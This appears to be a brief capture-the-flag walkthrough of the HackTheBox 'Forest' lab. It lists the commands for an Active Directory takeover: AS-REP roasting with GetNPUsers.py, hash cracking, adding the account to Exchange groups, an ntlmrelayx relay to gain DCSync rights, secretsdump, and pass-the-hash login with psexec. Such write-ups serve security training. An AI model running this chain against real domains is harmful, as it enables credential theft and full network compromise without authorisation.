Hackthebox Forest

Today's box is the Forest box from HackTheBox. It is a retired box and as such you can only accessed with the subscription. And also these notes are from 2019.

Initial enumeration:

With this box we start with nmap as usual

On this Forest box, ports 53, 88, 135, 139, 389, 445, 464, 593 and 626 are open.

Running more scans reveals ports 3268 and 3269 to be open.

Main scans

Run autorecon.py and wait for it to finish. One of the scans will give you a list of users.

Alternatively you can log in to rpcclient using a null session and gather users that way.

To get user

Use the GetNPUsers.py script to go through the user list. It will give you a hash for svc-alfresco.

python GetNPUsers.py htb.local/ -usersfile users.txt -format john -outputfile someMoreText.txt -dc-ip 10.10.10.161

Crack the hash to get the password using john.

Use evilwinrm to log in

Grab user.txt

To get root

First add the svc-alfresco user to these groups once you're logged in.

net group "Exchange Servers" svc-alfresco /add

net group "Exchange Windows Permissions" svc-alfresco /add

Then use the ntlm relay script to set the relay. Like so

ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco

Browse to localhost on the browser. It will ask you for the svc-alfresco credentials.

Wait for the relay script to tell you you can run secretsdump.

Then run this script

secretsdump.py HTB/svc-alfresco:[email protected] -just-dc-ntlm

Alternatively you can set the relay and *then* add the user to the groups.

One of those ways should work. Try both, if you're having problems.

Once you get the hashes from secretsdump script, grab the Administrator hash.

Login in with psexec with that hash.

python psexec.py htb.local/[email protected] -hashes hash1:hash2 -no-pass

(replace hash1 and hash2 with the admin hash in that format)

And now we have root.